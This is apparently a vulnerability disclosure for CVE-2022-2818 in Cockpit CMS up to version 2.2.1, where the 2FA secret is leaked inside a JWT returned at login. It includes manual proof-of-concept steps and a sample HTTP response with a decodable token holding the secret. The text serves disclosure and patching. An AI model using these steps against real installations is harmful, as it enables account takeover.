Headline
CVE-2022-2818: 2FA Bypass in Cockpit Content Platform ≤ v2.2.1 in cockpit
Authentication Bypass by Primary Weakness in GitHub repository cockpit-hq/cockpit prior to 2.2.2.
Description
2FA secret is disclosed in JWT token after user logs into his account in Cockpit Content Platform ≤ v2.2.1 allowing attacker to bypass the 2FA code.
Proof of Concept
1.Login with your admin account and enable 2FA in your account and logout.
2.Go to http://yourserver.com/cockpit221/auth/login and enter your username and password and intercept the request in BurpSuite or Owasp Zap.
3.Now, Click perform following action “Right click > Do intercept > Response to this request” and forward the request.
4.Now you will get a response like this from http://yourserver.com/cockpit221/auth/check.
HTTP/1.0 200 OK
Date: Thu, 11 Aug 2022 11:24:32 GMT
Server: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/8.1.6 mod_perl/2.0.12 Perl/v5.34.1
X-Powered-By: PHP/8.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 520
Connection: close
Content-Type: application/json
{"success":true,"user":{"name":"Suvam","user":"suvam","email":"[email protected]","twofa":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoic3V2YW0iLCJlbWFpbCI6ImFkbWluQHN1dmFtLmNvbSIsImFjdGl2ZSI6dHJ1ZSwibmFtZSI6IlN1dmFtIiwiaTE4biI6ImVuIiwicm9sZSI6ImFkbWluIiwidGhlbWUiOiJhdXRvIiwiX21vZGlmaWVkIjoxNjYwMjE2OTczLCJfY3JlYXRlZCI6MTY2MDIxNDU5OSwiX2lkIjoiN2QwM2FhZWI2MjM1NjVkZGM3MDAwMzRlIiwidHdvZmEiOnsiZW5hYmxlZCI6dHJ1ZSwic2VjcmV0IjoiMjdPWUNJSVpJQ1JER0JUVUFPVUVTQzNHM1BXNUU2Q04ifX0.Q5DL1pZv4bYI8909luvRZse4FnszLFOGIVCvGVcqbDk"}}
5.Now, copy the payload of JWT token and decode it. The structure of JWT token is like this header.payload.signature .
6.Decode the payload. You will notice that the Authentication Secret token is disclosed in the payload JWT token.
7.Copy the Authenticator Secret token and provide it to Google Authenticator . @2FA is bypassed.
8.Attacker can exploit this vulnerability to bypass 2FA.
Proof Of Concept Video : https://drive.google.com/file/d/1rKCtY5W7XyIuApHtVAdWOusHJpw8b8OF/view?usp=sharing****Impact
Account Takeover
Related news
Cockpit Content Platform through version 2.2.1 is vulnerable to a two-factor authentication (2FA) bypass. The 2FA secret is disclosed in a JWT token after user logs into their account, allowing an attacker to bypass the 2FA code. A patch is available on the `develop` branch and is expected to be part of version 2.2.2.